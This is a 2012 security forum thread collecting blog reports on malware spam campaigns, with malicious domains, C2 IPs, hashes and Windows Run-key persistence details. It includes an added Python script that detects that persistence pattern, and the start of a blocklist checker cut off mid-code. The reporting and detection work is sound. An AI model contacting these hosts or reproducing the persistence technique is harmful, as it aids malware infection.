- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/
Nov 29, 2012 - "Some malware are more persistent than others – like WORM_VOBFUS. This recent heap of WORM_VOBFUS variants seen spreading on Facebook does not exhibit new routines, but it is a good reminder for users about well-known, but easily forgotten safe computing practices... Disabling AUTORUN has its merits – but not everyone knows. Worms, like WORM_VOBFUS, are known to propagate by taking advantage of Windows Autorun feature on drives. To address this, users are often advised to disable Autorun to prevent their drives from being infected. For reasons of inconvenience (or maybe forgetfulness?) users do -not- disable this feature... As WORM_VOBFUS and other threats using old but reliable exploits show, threats do not burn and turn into ashes easily. Sometimes, they fade away but surface again..."
___
Dynamic DNS sites you might want to block II
- http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to_29.html
29 Nov 2012 - "These Dynamic DNS domains belong to a mystery outfit called dnsdynamic .org, and several of them seem to be in the process of being abused by third parties (for example). The registrations seem to be anonymised; some poking around at the recent WHOIS history of one of these domains (freedynamicdns .com) reveals ownership details of:
Manager, Domain manager @ invertebrateisp .com
Invertebrate ISP
PO Box 405
Glenmont, New York 12077
United States
+1.2623946781
More digging at invertabrateisp .com comes up with a real name:
Wilde, Tim [redacted]
[redacted]
Glenmont, New York 12077
United States
[redacted] Fax --
Anyway, Mr Wilde is -not- connected with the malicious activity going on with these domains, but he is providing a service that is being abused. Interestingly he founded DynDNS before selling it on. Dynamic DNS services can be useful, but my personal recommendation is that you should consider blocking them as the bad guys are very good at abusing them. Overall, these are not as bad as the ones run by ChangeIP .com (see here*). There are two versions of this list, one links through to the Google Safe Browsing diagnostics report in case you want to review them on a case-by-case basis before blocking them (-yellow- highlighted ones have some malware, -red- highlighted ones are blocked by Google). The second one is a plain list of everything in case you want to block them completely..."
(More detail and "the lists" at the dynamoo URL above)
* http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to.html
___
DNS server redirections ...
- http://www.theregister.co.uk/2012/11/28/google_romania_dns_hack/
28 Nov 2012 - "A hacker -redirected- web surfers looking for Yahoo, Microsoft or Google to a page showing a TV test card by apparently poisoning Google's public DNS system. Punters and organisations relying on Google's free service were affected, rather than the websites themselves being compromised. Visitors to yahoo .ro, microsoft .ro and google .ro were served a message from an Algerian miscreant using the moniker MCA-CRB. Traffic destined for the Romanian websites of Kaspersky Lab and Paypal was also hijacked... MCA-CRB is a prolific online graffiti artist who has defaced at least 5,000 sites, according to records kept by Zone-H*. The latest attack was carried out to gain bragging rights rather than to trouser a profit or stage a political protest... Last week, defaced copies of Google, Yahoo!, Microsoft, eBay and Apple's Pakistan websites were shown to surfers, again as a result of a DNS hijack... the affected Romanian sites were restored by Wednesday lunchtime, except Paypal.ro which proved difficult to reach in any case..."
* http://www.zone-h.org/archive/notifier=MCA-CRB
___
Bogus ‘Meeting Reminder’ emails serve malware
- http://blog.webroot.com/2012/11/29/bogus-meeting-reminder-themed-emails-serve-malware/
Nov 29, 2012 - "Cybercriminals are mass mailing malicious emails about a meeting you wouldn’t want to attend .. Once executed, the malicious attachment opens a backdoor on the affected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host. Naturally, we’ve been monitoring their operations for quite some time, and are easily able to identify multiple connections between their previously launched campaigns...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/bogus_meeting_reminder_email_spam_malware.png
... the malicious executable: MD5: a684feff699bb7e3b8814c32c1da8277 * ... Worm:Win32/Cridex.E.
It also creates the following registry keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
The newly created Registry Value is:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
KB00121600.exe = “%AppData%\KB00121600.exe” so that KB00121600.exe runs every time Windows starts.
Upon execution, the sample phones back to 64.150.187.72 :8080/AJw/UCygrDAA/Ud+asDAA (AS10316**)... We’ve also seen the same IP (64.150.187.72) used as name server in a previously profiled malicious campaign..."
* https://www.virustotal.com/file/1be5993395114936a0d60f0e0b92f3dcc9442287e1c18f503a452431e3f5ec4e/analysis/1353778430/
File name: Report.exe
Detection ratio: 38/44
Analysis date: 2012-11-24
** https://www.google.com/safebrowsing/diagnostic?site=AS:10316
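The DHL, Vodafone and Meeting Reminder samples above all persist the same way: a binary dropped into a profile root (%AllUsersProfile%\svchost.exe, %AppData%\KB00121600.exe) and started from a Run value, once under a name borrowed from the Java updater (SunJavaUpdateSched). This is an added example (not code from Webroot or the other quoted sources) that audits a .reg export of the Run keys for exactly those traits; the .reg text, the IgfxTray entry and the jusched.exe path are constructed, the Run values under test are the ones quoted in the posts.

```python
"""Audit Run/RunOnce values from a reg.exe / regedit .reg export for the
persistence pattern quoted in this thread.  Added example; SAMPLE_REG is
constructed."""
import ntpath
import re

# Where svchost.exe legitimately lives (regex over the lower-cased directory)
SYSTEM_DIR = re.compile(r"(\\windows|%systemroot%|%windir%)\\(system32|syswow64)$")
# Profile roots where a loose .exe is suspicious, in env-var or expanded form
PROFILE_ROOT = re.compile(
    r"^(%appdata%|%localappdata%|%allusersprofile%|%programdata%|%temp%|%tmp%|%userprofile%)$"
    r"|^c:\\users\\[^\\]+\\appdata\\(roaming|local)$"
    r"|^c:\\programdata$"
)
# Value names dressed up as a Windows update, e.g. KB00121600.exe
KB_NAME = re.compile(r"^kb\d{6,}(\.exe)?$")

# Constructed export: two Run values quoted in the thread plus two benign ones
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="%AllUsersProfile%\\svchost.exe"
"IgfxTray"="C:\\Windows\\System32\\igfxtray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"KB00121600.exe"="\"%AppData%\\KB00121600.exe\""
"SunJavaUpdateSched"="\"C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\""
'''


def unescape(s):
    """Undo .reg escaping: a backslash quotes the next character."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {'key','name','value'} for string values under Run/RunOnce keys."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('"') and key and key.lower().endswith(("\\run", "\\runonce")):
            name, _, value = line.partition("=")
            if not value.startswith('"'):
                continue  # dword:/hex: values cannot be commands
            entries.append({"key": key, "name": unescape(name.strip('"')),
                            "value": unescape(value[1:-1])})
    return entries


def exe_path(command):
    """The program part of a Run command: the quoted path, or the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def check(name, path):
    """Return the indicators that fire for one Run value (empty = clean)."""
    reasons = []
    base = ntpath.basename(path).lower()
    directory = ntpath.dirname(path).lower()
    if base == "svchost.exe" and not SYSTEM_DIR.search(directory):
        reasons.append("svchost_outside_system32")
    if base.endswith(".exe") and PROFILE_ROOT.match(directory):
        reasons.append("profile_root_executable")
    # The real Java updater value points at jusched.exe; anything else is a decoy
    if name.lower() == "sunjavaupdatesched" and base != "jusched.exe":
        reasons.append("java_updater_name_mismatch")
    if KB_NAME.match(name.lower()):
        reasons.append("kb_named_value")
    return reasons


def audit(entries):
    """Run check() over parsed entries and keep only those with findings."""
    findings = []
    for e in entries:
        path = exe_path(e["value"])
        reasons = check(e["name"], path)
        if reasons:
            findings.append({"key": e["key"], "name": e["name"],
                             "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(parse_reg(SAMPLE_REG)):
        print(f"{f['key']}\n  {f['name']} -> {f['path']}  [{', '.join(f['reasons'])}]")
```

On a live host, `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKCU equivalent) produces the input format; the legitimate jusched.exe entry shows why the value name alone is not enough to decide.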
AplusWebMaster
2012-11-30, 20:08
FYI...
Bogus ‘Intuit Software Order Confirmations’ lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/30/bogus-intuit-software-order-confirmations-lead-to-black-hole-exploit-kit/
Nov 30, 2012 - "Sticking to their well proven practice of systematically rotating impersonated brands, the cybercriminals behind a huge majority of the malicious campaigns that we’ve been profiling recently are once again impersonating Intuit in an attempt to trick its customers into clicking on links exposing them to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot from the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/fake_intuit_software_order_confirmation_email_spam_exploits_malware.png
Sample spamvertised URL re-director: hxxp ://www.mysnap .com.tw/sites/default/files/upload.htm?RANDOM_CHARACTERS
Client-side exploits serving URL: hxxp ://moneymakergrow .ru:8080/forum/links/column.php
Malicious domain name reconnaissance:
moneymakergrow .ru – 202.180.221.186, AS24496; 203.80.16.81, AS24514; 207.126.57.208
Name server: ns1.moneymakergrow .ru – 62.76.178.233
Name server: ns2.moneymakergrow .ru – 132.248.49.112
Name server: ns3.moneymakergrow .ru – 84.22.100.108
Name server: ns4.moneymakergrow .ru – 65.99.223.24
... Although we couldn’t reproduce the client-side exploitation, we’ve already seen the majority of these malicious domains in previously profiled campaigns..."
___
Bogus ‘End of August Invoices’ emails serve malware and client-side exploits
- http://blog.webroot.com/2012/11/30/bogus-end-of-august-invoices-themed-emails-serve-malware-and-client-side-exploits/
Nov 30, 2012 - "Cybercriminals have recently launched yet another massive spam campaign attempting to trick users into clicking on malicious links or executing malicious attachments found in the spamvertised emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/august_invoices_email_spam_malware_exploits.png
Sample detection rate for the malicious attachment: MD5: 8b194d05c7e7f96a37b1840388231791 * ... Trojan:Win32/Ransom
Sample client-side exploits serving URL: hxxp ://forumibiza .ru:8080/forum/links/column.php
Although we couldn’t obtain the actual payload, the gathered intelligence indicates that this is a campaign launched by the same group that we’ve been monitoring for a few weeks now, allowing us to more effectively expose their campaigns and protect Internet users...
Malicious domain name reconnaissance:
forumibiza.ru – 65.99.223.24, AS30496; 103.6.238.9, AS21125; 203.80.16.81, AS24514
Name server: ns1.forumibiza .ru – 62.76.186.190
Name server: ns2.forumibiza .ru – 84.22.100.108
Name server: ns3.forumibiza .ru – 50.22.102.132
Name server: ns4.forumibiza .ru – 213.251.171.30
... malicious domains also respond to the same IPs (65.99.223.24; 103.6.238.9; 203.80.16.81). We’ve already seen these in several previously profiled malicious campaigns..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/d86d78abfa69924c8ce84ef25c957bd06bd22861d06844817c1484fb763a2c2a/analysis/1353823689/
File name: Invoices.exe
Detection ratio: 39/44
Analysis date: 2012-11-25
___
(Here they come...) Santa SCAMS...
- http://community.websense.com/blogs/securitylabs/archive/2012/11/30/personalized-letters-from-scamta-claus.aspx
Nov 30, 2012 - "... detected a marked increase in spam emails seeking to exploit fans of the big man himself: Santa Claus... They claim to offer alternative services to ensure that your "little ones" receive personalized responses from Santa. As is often the case in today’s unsolicited email world, the links within these emails don’t take you to a reputable and Santa-approved communication facilitator. Rather than being prompted for personal details about your little ones (which in itself poses an interesting discussion of internet safety and the sharing of personal details with random websites) you’ll probably find that you’re either a winner, or a potential winner, of some new fruit-branded hardware. All you have to do is complete a survey or an affiliate offer...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7360.santa1.png
... subject lines to catch your attention and elicit a response:
- Personal Letter From Santa For Your Child
- (A) Letter From Santa For Your Child
- Santa Claus Letters
- A personal letter from Santa for your little ones
- Custom Santa Letters
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7848.santa2.png
Clicking the "Click Here" links within many of these messages directs you to an official-looking web-browser opinion survey, tailored to the browser from which you are viewing the page: Simple browser detection and IP geolocation techniques are used to appear convincing.
Unfortunately, other than the opinion survey, the only personalized item you’re likely to receive from this point on is more spam, scams, or empty offers. No amount of form-filling, survey submissions, or offer completions are likely to result in the desired letter from Santa Claus. Therefore, if you are looking to assist Santa with his letter-sending duties, please stick to reputable organizations. Many charities, for example, provide this service legitimately..."
___
"Copies of Policies" SPAM / podarunoki .ru
- http://blog.dynamoo.com/2012/11/copies-of-policies-spam-podarunokiru.html
30 Nov 2012 - "This spam leads to malware on podarunoki .ru:
Date: Fri, 30 Nov 2012 04:54:30 -0300
From: Jone Castaneda via LinkedIn [member@linkedin.com]
Subject: RE: Leonie - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Leonie Doyle,
==========
Date: Fri, 30 Nov 2012 02:32:21 -0400
From: sales1@[victimdomain].com
Subject: RE: Samson - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Samson Henry,
The malicious payload is at [donotclick]podarunoki .ru:8080/forum/links/column.php hosted on some familiar IP addresses which should be blocked if you can:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
___
iTunes SPAM / mokingbirdgives .org
- http://blog.dynamoo.com/2012/11/itunes-spam-mokingbirdgivesorg.html
30 Nov 2012 - "This fake iTunes spam leads to malware on mokingbirdgives .org:
From: iTunes itunes @ new .itunes .com
To: purchasing [purchasing @victimdomain .com]
Date: 30 November 2012 17:02
Subject: Your receipt #16201509085048
Billed To:
%email%
Order Number: M1V008146011
Receipt Date: 30/11/2012
Order Total: $699.99
Billed To: Credit card
Item Number Description Unit Price
1 Postcard (View\Download )
Cancel order Not your order?Report a Problem $699.99
Subtotal: $699.99
Tax: $0.00
Order Total: $699.99
Please retain for your records.
Please See Below For Terms And Conditions Pertaining To This Order.
Apple Inc.
You can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies
FBI ANTI-PIRACY WARNING
UNAUTHORIZED COPYING IS PUNISHABLE UNDER FEDERAL LAW.
Answers to frequently asked questions regarding the iTunes Store can be found at http ://www.apple .com/support/itunes/store/
Apple ID Summary • Detailed invoice
Apple respects your privacy.
Copyright © 2011 Apple Inc. All rights reserved
The malicious payload is at [donotclick]mokingbirdgives .org/less/demands-probably.php (report here) hosted on 184.82.100.201 (HostNOC, US) along with the following domains which also appear to be malicious: ..."
(Long list at the dynamoo URL above.)
:mad: :mad: :mad:
AplusWebMaster
2012-12-03, 08:53
FYI...
Malicious email MMS targets mobile phone users
- http://community.websense.com/blogs/securitylabs/archive/2012/12/02/Malicious-email-MMS-targets-mobile-phone-users.aspx
2 Dec 2012 - "... Websense... has detected a malicious spam campaign that tries to exploit customers of major mobile phone companies. Specifically, we have detected thousands of emails claiming users have received MMS content via email localized to Australian and German carriers late last week:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3731.both.png
Because mobile phone use is an everyday activity, users could be tricked into opening and running attachments, especially those that appear to come from their carriers. Once the malware is launched, it connects to a list of remote servers to download more malicious binaries. What is interesting about these samples is that they are heavily encrypted and have many anti-debug tricks. Unlike other malware, this sample deploys several decryption phases before finally executing its malicious function. Even more interesting, it implements all its tricks, like decryption and patching, only in memory... It downloads malicious binaries from these remote servers:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6523.8_5F00_downloader.jpg
173.254.28.81 ... During our analysis, some of the remote servers were still available, and the malicious binary files were still downloadable..."
___
More Wire Transfer SPAM / panamechkis .ru
- http://blog.dynamoo.com/2012/12/wire-transfer-spam-panamechkisru.html
3 Dec 2012 - "This fake wire transfer spam leads to malware on panamechkis .ru:
Date: Mon, 3 Dec 2012 11:34:38 +0330
From: HarrisonCrumm @ mail .com
Subject: RE: Wire Transfer cancelled
Dear Customers,
Wire transfer was canceled.
Rejected transfer:
FED NUMBER: 1704196955WIRE580676
Transaction Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]panamechkis .ru:8080/forum/links/column.php hosted on:
113.197.88.226 (ULNetworks, Korea)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
Of these, 113.197.88.226 seems to be a new one which should be added to your blocklists."
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-4/
Dec 3, 2012 - "... noteworthy spam samples found and documented by our researchers in the AV Labs in our Tumblr page*..."
* http://gfisoftware.tumblr.com/
NY Better Business Bureau Attachment Spam - December 03, 2012
Malicious HP ScanJet Spam Continue - December 03, 2012
Malicious Wire Transfer Spam Continued - Dec 3, 2012
Account has been blocked - Dec 2, 2012
RapidFAX Spam - Dec 3, 2012
NACHA Spam: Your Direct Deposit software is out of date
eFax Corporate Message Spam - Nov 29, 2012
Malicious FedEx Spam Continues - Nov 24, 2012 ...
___
http://www.ironport.com/toc/media/toc_threat_level_3.gif
- http://www.ironport.com/toc/
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Malicious Personal Pictures Attachment E-mail Messages - December 04, 2012
Fake Scanned Document E-mail Messages - December 04, 2012
Malicious Attachment E-mail Messages - December 04, 2012
Fake Picture Link E-mail Messages - December 04, 2012
Fake Tax Refund Notification E-mail Messages - December 04, 2012
Fake Credit Card Transaction Notification E-mail Messages - December 04, 2012
Fake Scanned Document E-mail Messages - December 03, 2012
Fake ADP Digital Certificate Notification E-mail Messages - December 03, 2012
Fake Business Complaint E-mail Messages - December 03, 2012
Fake FedEx Shipment Notification E-mail Messages - December 03, 2012
Fake Xerox Scan Attachment E-mail Messages - December 03, 2012
Fake Picture Link E-mail Messages - December 03, 2012
Malicious Personal Pictures Attachment E-mail Messages - December 03, 2012
Fake Picture Posting Notification E-mail Messages - December 03, 2012
Fake Discount Purchases Notification E-mail Messages - December 03, 2012
Fake Telegram Notification E-mail Messages - December 03, 2012 ...
:mad:
AplusWebMaster
2012-12-04, 14:38
FYI...
Fake FedEx emails lead to malware
- http://blog.webroot.com/2012/12/04/fake-fedex-tracking-number-themed-emails-lead-to-malware/
Dec 4, 2012 - "At the end of October, a cybercriminal or group of cybercriminals launched three massive spam campaigns in an attempt to trick users into clicking on a deceptive link and downloading a malicious attachment. Upon execution, the malware phones back to the command and control servers operated by the party that launched it, allowing complete access to the infected PC. This time they didn’t try impersonating USPS, UPS or DHL, but FedEx...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware.png?w=481
Second screenshot of a sample spamvertised email, again, part of the same campaign:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware_second_email_template.png?w=545
Third screenshot of a sample spamvertised email used in the campaign:
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware_third_email_template.png?w=495
Sample detection rate for the first sample: MD5: 0e2e1ef473bb731d462fb1c8b3dd7089 * ... Trojan.Win32.Buzus.mruv
Upon execution, it phones back to the following URLs:
hxxp ://91.121.90.80 :8080/...
hxxp ://84.40.69.119 :8080/...
hxxp ://211.172.112.7 :8080/...
Sample detection rate for the second sample: MD5: ab25d6dbf9b041c0a7625f660cfa17aa ** ... Trojan-Dropper.Win32.Dapato.bxhg
Upon execution, it phones back to the following URLs:
hxxp ://59.25.189.234 :8080/...
hxxp ://140.135.66.217 :8080/...
hxxp ://82.113.204.228 :8080/...
hxxp ://59.126.131.132 :8080/...
None of these IPs currently respond to any specific domains, besides 59.126.131.132.
songwriter .tw is currently responding to 59.126.131.132 – Email: songwriter .tw@ gmail .com...
> https://webrootblog.files.wordpress.com/2012/12/fedex_tracking_number_email_spam__malware__compromised_server.png?w=1024
The domain seems to be a legitimate Taiwanese songwriting company/individual, indicating that their server has been compromised and is currently used as command and control server.
Sample detection rate for the third sample: MD5: 252c797959273ff513d450f9af1d0242 *** ... TrojanDownloader:Win32/Kuluoz.B..."
* https://www.virustotal.com/file/eab57e08c7c8ebae6a003ace72a5174d4b4ef82933dfc951a7bb52b403361e9c/analysis/1354489330/
File name: Postal_Receipt.exe
Detection ratio: 35/46
Analysis date: 2012-12-02
** https://www.virustotal.com/file/2b6ece32653683ec5b123ae2efdde969b29f22d136d2370a7747b02f4bd4fce4/analysis/1354489404/
File name: Postal_Receipt1.exe
Detection ratio: 37/46
Analysis date: 2012-12-02
*** https://www.virustotal.com/file/ecb97f6aa2757746f36c02b41b23103f825291ba21795e8492ec1f4c9c2bcf98/analysis/1354489465/
File name: PostalReceipt2.exe
Detection ratio: 25/46
Analysis date: 2012-12-02
___
"ARK Bureau" fake job offer
- http://blog.dynamoo.com/2012/12/ark-bureau-fake-job-offer.html
4 Dec 2012 - "The ARK Architecture Bureau is a genuine company. This fake job offer is -not- from ARK Bureau, but is some sort of illegal activity such as money laundering.
From: Odette Holcomb [mailto:nbnian@esonchem.co.kr]
Sent: 03 December 2012 12:32
Subject: Help wanted.
POSITION: Customer Assistant
ABOUT COMPANY:
ARK Bureau has served hundreds of clients in the United Kingdom, Poland, France and Germany since 1998.
The firm was created by Lorinda Rogers, a young architect of Canadian origin. From its inception, ARK Bureau's vision for design and construction was based on system approach, incorporating both building and landscape design. That philosophy has always meant the highest quality for our clients. That's probably why ARK Bureau enjoys a strong loyalty from the past customers.
Now we have open vacancy in the U.S.: Customer Assistant
RESPONSIBILITIES:
- Process payments from customers;
- Filing invoices, statements and associated documents;
- Meet and exceed performance and time management goals;
- Other duties as required.
GENERAL SKILLS:
- High communication skills;
- Strong problem solving and planning skills;
- Experienced computer & internet user.
APPLY:
To apply please: arkbureaumanager @nokiamail .com
An alternative version uses the email address of arkbureau_manager @nokiamail .com. The two samples that I have seen have originating IP addresses of 174.52.171.8 (Comcast, US) and 109.173.54.245 (NCNET, Russia). You should give this fake company a wide berth unless you want to end up in serious trouble with law enforcement."
___
ADP SPAM / fsblimitedrun .pro
- http://blog.dynamoo.com/2012/12/adp-spam-fsblimitedrunpro.html
3 Dec 2012 - "This fake ADP spam leads to malware on fsblimitedrun .pro:
From: ADP Transaction Status
Date: 3 December 2012 17:55
Subject: ADP Major Accounts Processed Case
Valued customer:
James lately covered Transaction at your account. Event # 433933082.
Case Caption: 6CO7
Incident Substantiation: Download
We at ADP obtain to create a personalized and client focused experience with every client interaction.
Please view transaction changed by visiting the link below.
Click here - ADP Major Accounts Operation Progress mentioned above
Best Wishes,
James Brooks
Vice President of Customer Care Department ADP
ADP Major Accounts
***Reminder***
Please remember to complete your Semi-Annual Service Quality Survey!
Our Goal is to ensure you are VERY SATISFIED with each interaction you have with our Service Associates and we ask that you consider your overall experience in the 6 months preceding your receipt of the survey. We strive to provide WORLD CLASS SERVICE and determine our success by your satisfaction with ADP's services.
**********
This e-mail was delivered from an robot account.
Please don't reply to this message. auomatic informational system unable to accept incoming email.
The malicious payload is at [donotclick]fsblimitedrun .pro/detects/survey_success-complete.php hosted on 41.215.225.202 (Essar Wireless Kenya Ltd) along with the following malicious domain: fdic-update-install .info . Blocking access to this IP address would probably be prudent.
___
"Scan from a Hewlett-Packard ScanJet" SPAM / somaliaonfloor .ru
- http://blog.dynamoo.com/2012/12/scan-from-hewlett-packard-scanjet-spam.html
3 Dec 2012 - "This fake printer spam leads to malware on somaliaonfloor .ru:
Date: Mon, 3 Dec 2012 09:25:59 -0600
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #3838
A document was scanned and sent to you using a Hewlett-Packard HP15310290
Sent to you by: ROSIO
Pages : 8
Filetype(s): Images (.jpeg) View
==========
Date: Mon, 3 Dec 2012 11:06:22 -0500
From: "service@paypal.com" [service@paypal.com]
Subject: Re: Fwd: Scan from a Hewlett-Packard ScanJet 33712789
A document was scanned and sent to you using a Hewlett-Packard HP8220647
Sent to you by: CLAUDIA
Pages : 7
Filetype(s): Images (.jpeg) View
The malicious payload is at [donotclick]somaliaonfloor .ru:8080/forum/links/public_version.php hosted on the same IPs used in this attack.
113.197.88.226 (ULNetworks, Korea)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
___
"Most recent events on Facebook" SPAM / attachedsignup .pro
- http://blog.dynamoo.com/2012/12/most-recent-events-on-facebook-spam.html
4 Dec 2012 - "This fake Facebook spam leads to malware on attachedsignup .pro:
Date: Tue, 4 Dec 2012 15:19:16 +0100
From: " Facebook Security Team" [fractionallyb9 @hendrickauto .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have closed your Facebook account. You can rebuild your account whenever you wish by logging into Facebook using your current login email address and password. Subsequently you will be able to take advantage of the site as usually.
Please use the link below to reactivate :
http://www.facebook.com/home.php
If this was you, please pass over this informer. If this wasn't you, please secure your account, as some outlaw person may be explore it.
Best regards, The FaceBook Team
Please note: Facebook will never ask for your personal data through email.
This message was sent to [redacted] from your profile details. Facebook, Inc., Attention: Department 437, PO Box 20000, Palo Alto, CA 96906
The malicious payload is at [donotclick]attachedsignup .pro/detects/links-neck.php (report here*) hosted on 41.215.225.202 (Essar Wireless Kenya Ltd) which also hosts the probably malicious domain sessionid0147239047829578349578239077 .pl..."
* http://wepawet.iseclab.org/view.php?hash=11f118205af1e6914d99b42e729ae9a0&t=1354631759&type=js
___
US Airways SPAM / attachedsignup .pro
- http://blog.dynamoo.com/2012/12/us-airways-spam-attachedsignuppro.html
4 Dec 2012 - "This fake US Airways spam leads to malware on attachedsignup .pro:
From: US Airways - Booking [reservations @myusairways .com]
Date: 4 December 2012 14:30
Subject: US Airways online check-in.
You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you're flying internationally). After that, all you have to do is print your boarding pass and go to the gate.
Purchase code: 183303
Check-in online: Online booking details
Payment method: Credit card
Money will be withdrawn in next 3 days
Voyage
5990
Departure city and time
Massachusets MA (DCA) 10:10 AM
Depart date: 12/05/2012
We takes care to protect your privacy. Your information is kept private and confidential. For information about our privacy policy visit usairways.com.
US Airways, 145 W. Rio Salado Pkwy, Tempe, AK 93426 , Copyright US Airways , All rights reserved.
The payload and IP addresses are identical to this spam* doing the rounds today."
* http://blog.dynamoo.com/2012/12/most-recent-events-on-facebook-spam.html
___
Facebook "You have notifications pending" SPAM / francese .ru
- http://blog.dynamoo.com/2012/12/facebook-you-have-notifications-pending.html
4 Dec 2012 - "This fake Facebook spam leads to malware on francese.ru:
Date: Tue, 4 Dec 2012 03:38:42 +0000
From: KaseyElleman @victimdomain .com
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
SALLIE FELIX has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to postinialerts@[redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]francese .ru:8080/forum/links/column.php hosted on the following IP addresses:
42.121.116.38 (Aliyun Computing Co, China)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks , US)
219.255.134.110 (SK Broadband, Korea)
..."
:mad::mad:
AplusWebMaster
2012-12-05, 15:40
FYI...
Zbot sites to block 5/12/12
- http://blog.dynamoo.com/2012/12/zbot-sites-to-block-51212.html
5 Dec 2012 - "These domains and IPs are involved in malware distribution, especially the Zbot trojan. Most are using the nameservers in the dnsnum10 .com domain, or are co-hosted on the same server and have malicious characteristics. I've come up with a recommended blocklist based on the characteristics on the netblocks in question. If you are based in Russia, Ukraine, Poland or Iran then you may want to review these carefully.
IP addresses and hosts
31.184.244.73 (TOEN Incorporated, UAE)
62.122.74.47 (Leksim, Poland)
77.72.133.69 (Colobridge, Germany)
78.46.205.130 (Hetzner, Germany)
78.140.135.211 (Webazilla, Gibraltar)
85.143.166.132 (PIRIX, Russia)
87.107.121.131 (Soroush Rasanheh Company Ltd, Iran)
91.211.119.56 (Zharkov Mukola Mukolayovuch, Ukraine)
91.231.156.25 (Sevzapkanat-Unimars, Russia)
91.238.83.56 (Standart LLC, Moldova)
146.185.255.161 (Sergeev Sergei Yurievich PE, Russia)
178.162.132.202 (Tower Marketing, Belize)
178.162.134.176 (Silin Vitaly Petrovich, Belarus)
188.93.210.28 (Hosting Service, Russia)
195.88.74.110 (Info Data Center, Bulgaria)
198.144.183.227 (Colocrossing, US)
... Recommended blocklist:
..."
(More detail at the dynamoo URL above.)
___
BBB SPAM / leberiasun .ru
- http://blog.dynamoo.com/2012/12/bbb-spam-leberiasunru.html
5 Dec 2012 - "This fake BBB spam leads to malware on leberiasun .ru:
Date: Wed, 5 Dec 2012 11:32:47 +0330
From: Bebo Service [service @noreply .bebo .com]
Subject: Urgent information from BBB
Attn: Owner/Manager
Here with the Better Business Bureau notifies you that we have received a complaint (ID 243917811)
from one of your customers with respect to their dealership with you.
Please open the COMPLAINT REPORT below to obtain more information on this matter and let us know of your point of view as soon as possible.
We are looking forward to your prompt reply.
Regards,
JONELLE Payne
The malicious payload is at [donotclick]leberiasun .ru:8080/forum/links/column.php (report here) hosted on the following IPs:
42.121.116.38 (Aliyun Computing Co, China)
202.180.221.186 (GNet, Mongolia)
208.87.243.131 (Psychz Networks, US)
219.255.134.110 (SK Broadband, Korea)..."
:mad:
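Added illustration, not code from the dynamoo or Webroot posts quoted above: a small Python checker that loads the recommended Zbot blocklist and the hosts repeatedly named in this thread, matches the ":8080/forum/links/column.php" landing-page pattern that recurs across the campaigns, and runs constructed proxy-log lines through both checks. The log lines, client addresses and the example.com/dns.google entries are constructed; the indicators are the ones quoted in the posts above.

```python
import ipaddress
import re
from typing import List, Optional
from urllib.parse import urlsplit

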